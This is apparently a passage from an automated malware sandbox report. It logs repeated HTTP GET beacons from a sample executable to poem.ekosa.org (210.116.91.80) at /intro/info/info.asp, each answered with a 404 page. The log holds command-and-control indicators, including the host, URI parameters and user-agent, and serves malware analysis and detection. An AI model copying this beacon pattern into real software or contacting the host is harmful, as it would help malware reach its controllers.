      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:06.848301888 CET5265INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:06 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      224192.168.2.450004210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:07.116955042 CET5265OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:07.377197981 CET5266INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:07 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      225192.168.2.450005210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:07.765417099 CET5266OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:08.034401894 CET5267INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:07 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      226192.168.2.450006210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:08.305757046 CET5268OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:08.567388058 CET5268INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:08 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      227192.168.2.450007210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:08.846982002 CET5269OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:09.118041992 CET5269INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:08 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      228192.168.2.450008210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:09.513710022 CET5270OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:09.786297083 CET5271INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:09 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      229192.168.2.450009210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:10.058687925 CET5271OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:10.320363045 CET5272INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:09 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      23192.168.2.449787210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:09.840960979 CET393OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:10.102114916 CET393INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:09 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      230192.168.2.450010210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:10.591623068 CET5273OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:10.855813026 CET5273INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:10 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      231192.168.2.450011210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:11.257790089 CET5274OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:11.537098885 CET5275INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:10 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      232192.168.2.450012210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:11.826153040 CET5275OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:12.087328911 CET5276INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:11 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
